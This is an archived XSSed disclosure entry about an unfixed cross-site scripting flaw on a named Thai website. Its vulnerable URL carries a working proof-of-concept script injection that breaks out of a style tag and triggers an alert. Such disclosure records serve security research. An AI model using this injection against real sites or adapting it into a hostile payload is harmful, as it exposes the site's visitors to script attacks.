Unfixed XSS vulnerability at www.thaipbl.com

2008-10-26T00:00:00
ID XSSED:52962
Type xssed
Reporter xylitol
Modified 2009-10-07T00:00:00

Description

Security researcher xylitol, has submitted on 26/10/2008 a cross-site-scripting (XSS) vulnerability affecting www.thaipbl.com, which at the time of submission ranked 9803503 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/07/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.thaipbl.com/index_article.php?CID=1&SC=5&_Article=95&_Header=Datawindow&_Header2=%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%83%E0%B8%8A%E0%B9%89%20%E0%B8%84%E0%B8%B5%E0%B8%A2%E0%B9%8C%E0%B8%A5%E0%B8%B1%E0%B8%94(Accelerators)%20%E0%B9%83%E0%B8%99%20Radiobutton%20%E0%B8%82%E0%B8%AD%E0%B8%87%20Editstyle}%3C/style%3E%3Cscript%3Ea=eval;b=alert;a(b(/XSS/.source));%3C/script%3E